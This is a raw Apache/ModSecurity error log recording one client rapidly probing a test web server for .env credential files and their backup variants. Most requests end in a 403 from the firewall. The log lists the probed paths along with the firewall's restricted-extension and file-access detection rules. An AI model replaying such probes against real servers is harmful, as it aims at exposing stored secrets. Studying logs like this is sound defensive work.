[Sun Nov 16 12:38:51.181902 2025] [:error] [pid 113283] [client 3.8.102.89:51824] [client 3.8.102.89] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/assets/.env"] [unique_id "aRm3yw0D7yRPJp9gclT4hgAAAAM"]
[Sun Nov 16 12:38:51.182071 2025] [:error] [pid 113283] [client 3.8.102.89:51824] [client 3.8.102.89] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/assets/.env"] [unique_id "aRm3yw0D7yRPJp9gclT4hgAAAAM"]
[Sun Nov 16 12:38:51.190891 2025] [:error] [pid 107814] [client 3.8.102.89:51806] [client 3.8.102.89] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".old"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "surf.test.indacotrentino.com"] [uri "/app/.env.old"] [unique_id "aRm3y4YUzNZoYnjqey4--AAAAAc"]
[Sun Nov 16 12:38:51.191029 2025] [:error] [pid 107814] [client 3.8.102.89:51806] [client 3.8.102.89] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /app/.env.old"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/app/.env.old"] [unique_id "aRm3y4YUzNZoYnjqey4--AAAAAc"]
[Sun Nov 16 12:38:51.191187 2025] [:error] [pid 107814] [client 3.8.102.89:51806] [client 3.8.102.89] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/app/.env.old"] [unique_id "aRm3y4YUzNZoYnjqey4--AAAAAc"]
[Sun Nov 16 12:38:51.191336 2025] [:error] [pid 107814] [client 3.8.102.89:51806] [client 3.8.102.89] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 10, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/app/.env.old"] [unique_id "aRm3y4YUzNZoYnjqey4--AAAAAc"]
[Sun Nov 16 12:38:51.223899 2025] [:error] [pid 113290] [client 3.8.102.89:51892] [client 3.8.102.89] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.sample"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.sample"] [unique_id "aRm3y39I9DIP5OQurvpqkgAAAAQ"]
[Sun Nov 16 12:38:51.224118 2025] [:error] [pid 113290] [client 3.8.102.89:51892] [client 3.8.102.89] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.sample"] [unique_id "aRm3y39I9DIP5OQurvpqkgAAAAQ"]
[Sun Nov 16 12:38:51.224298 2025] [:error] [pid 113290] [client 3.8.102.89:51892] [client 3.8.102.89] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.sample"] [unique_id "aRm3y39I9DIP5OQurvpqkgAAAAQ"]
[Sun Nov 16 12:38:51.227113 2025] [:error] [pid 107823] [client 3.8.102.89:51696] [client 3.8.102.89] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /app/.env.save"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/app/.env.save"] [unique_id "aRm3y2ZlvYqdbt58w-ZoQwAAABA"]
[Sun Nov 16 12:38:51.227285 2025] [:error] [pid 107823] [client 3.8.102.89:51696] [client 3.8.102.89] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/app/.env.save"] [unique_id "aRm3y2ZlvYqdbt58w-ZoQwAAABA"]
[Sun Nov 16 12:38:51.227457 2025] [:error] [pid 107823] [client 3.8.102.89:51696] [client 3.8.102.89] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/app/.env.save"] [unique_id "aRm3y2ZlvYqdbt58w-ZoQwAAABA"]
[Sun Nov 16 12:38:51.235577 2025] [:error] [pid 113276] [client 3.8.102.89:51926] [client 3.8.102.89] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".old"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "surf.test.indacotrentino.com"] [uri "/public/.env.old"] [unique_id "aRm3y7Xvaf1IcB4yJOvE_gAAAAU"]
[Sun Nov 16 12:38:51.235722 2025] [:error] [pid 113276] [client 3.8.102.89:51926] [client 3.8.102.89] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /public/.env.old"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/public/.env.old"] [unique_id "aRm3y7Xvaf1IcB4yJOvE_gAAAAU"]
[Sun Nov 16 12:38:51.235859 2025] [:error] [pid 113276] [client 3.8.102.89:51926] [client 3.8.102.89] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/public/.env.old"] [unique_id "aRm3y7Xvaf1IcB4yJOvE_gAAAAU"]
[Sun Nov 16 12:38:51.236003 2025] [:error] [pid 113276] [client 3.8.102.89:51926] [client 3.8.102.89] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 10, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/public/.env.old"] [unique_id "aRm3y7Xvaf1IcB4yJOvE_gAAAAU"]
[Sun Nov 16 12:38:51.277308 2025] [:error] [pid 113296] [client 3.8.102.89:51742] [client 3.8.102.89] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".old"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.old"] [unique_id "aRm3y_7nuvXY8JVEGWXCgQAAAA8"]
[Sun Nov 16 12:38:51.277457 2025] [:error] [pid 113296] [client 3.8.102.89:51742] [client 3.8.102.89] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.old"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.old"] [unique_id "aRm3y_7nuvXY8JVEGWXCgQAAAA8"]
[Sun Nov 16 12:38:51.277642 2025] [:error] [pid 113296] [client 3.8.102.89:51742] [client 3.8.102.89] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.old"] [unique_id "aRm3y_7nuvXY8JVEGWXCgQAAAA8"]
[Sun Nov 16 12:38:51.277790 2025] [:error] [pid 113296] [client 3.8.102.89:51742] [client 3.8.102.89] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 10, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.old"] [unique_id "aRm3y_7nuvXY8JVEGWXCgQAAAA8"]
[Sun Nov 16 12:38:51.313616 2025] [:error] [pid 111778] [client 3.8.102.89:51898] [client 3.8.102.89] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /config/.env.save"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/config/.env.save"] [unique_id "aRm3yx7OFadbAiGPfqkqzAAAAAI"]
[Sun Nov 16 12:38:51.313812 2025] [:error] [pid 111778] [client 3.8.102.89:51898] [client 3.8.102.89] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/config/.env.save"] [unique_id "aRm3yx7OFadbAiGPfqkqzAAAAAI"]
[Sun Nov 16 12:38:51.313979 2025] [:error] [pid 111778] [client 3.8.102.89:51898] [client 3.8.102.89] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/config/.env.save"] [unique_id "aRm3yx7OFadbAiGPfqkqzAAAAAI"]
[Sun Nov 16 12:38:51.316447 2025] [:error] [pid 113290] [client 3.8.102.89:51826] [client 3.8.102.89] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.orig"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.orig"] [unique_id "aRm3y39I9DIP5OQurvpqkwAAAAQ"]
[Sun Nov 16 12:38:51.316612 2025] [:error] [pid 113290] [client 3.8.102.89:51826] [client 3.8.102.89] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.orig"] [unique_id "aRm3y39I9DIP5OQurvpqkwAAAAQ"]
[Sun Nov 16 12:38:51.316763 2025] [:error] [pid 113290] [client 3.8.102.89:51826] [client 3.8.102.89] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.orig"] [unique_id "aRm3y39I9DIP5OQurvpqkwAAAAQ"]
[Sun Nov 16 12:38:51.322429 2025] [:error] [pid 113283] [client 3.8.102.89:51878] [client 3.8.102.89] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.test"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.test"] [unique_id "aRm3yw0D7yRPJp9gclT4hwAAAAM"]
[Sun Nov 16 12:38:51.322576 2025] [:error] [pid 113283] [client 3.8.102.89:51878] [client 3.8.102.89] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.test"] [unique_id "aRm3yw0D7yRPJp9gclT4hwAAAAM"]
[Sun Nov 16 12:38:51.322778 2025] [:error] [pid 113283] [client 3.8.102.89:51878] [client 3.8.102.89] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.test"] [unique_id "aRm3yw0D7yRPJp9gclT4hwAAAAM"]
[Sun Nov 16 12:38:51.327556 2025] [:error] [pid 113274] [client 3.8.102.89:51814] [client 3.8.102.89] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /admin/.env.save"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/admin/.env.save"] [unique_id "aRm3y44DuVT7Zp3PDSdxJQAAAAE"]
[Sun Nov 16 12:38:51.327701 2025] [:error] [pid 113274] [client 3.8.102.89:51814] [client 3.8.102.89] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/admin/.env.save"] [unique_id "aRm3y44DuVT7Zp3PDSdxJQAAAAE"]
[Sun Nov 16 12:38:51.327883 2025] [:error] [pid 113274] [client 3.8.102.89:51814] [client 3.8.102.89] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/admin/.env.save"] [unique_id "aRm3y44DuVT7Zp3PDSdxJQAAAAE"]
[Sun Nov 16 12:38:51.339569 2025] [:error] [pid 107792] [client 3.8.102.89:51648] [client 3.8.102.89] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /api/.env.save"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/api/.env.save"] [unique_id "aRm3y-0VDMccOZESIOBvtQAAAAA"]
[Sun Nov 16 12:38:51.339725 2025] [:error] [pid 107792] [client 3.8.102.89:51648] [client 3.8.102.89] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/api/.env.save"] [unique_id "aRm3y-0VDMccOZESIOBvtQAAAAA"]
[Sun Nov 16 12:38:51.339891 2025] [:error] [pid 107792] [client 3.8.102.89:51648] [client 3.8.102.89] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/api/.env.save"] [unique_id "aRm3y-0VDMccOZESIOBvtQAAAAA"]
[Sun Nov 16 12:38:51.344036 2025] [authz_core:error] [pid 113276] [client 3.8.102.89:51942] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.env.dist
[Sun Nov 16 12:38:51.380843 2025] [authz_core:error] [pid 107814] [client 3.8.102.89:51910] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/admin
[Sun Nov 16 12:38:51.396075 2025] [:error] [pid 107823] [client 3.8.102.89:51932] [client 3.8.102.89] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".old"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "surf.test.indacotrentino.com"] [uri "/src/.env.old"] [unique_id "aRm3y2ZlvYqdbt58w-ZoRAAAABA"]
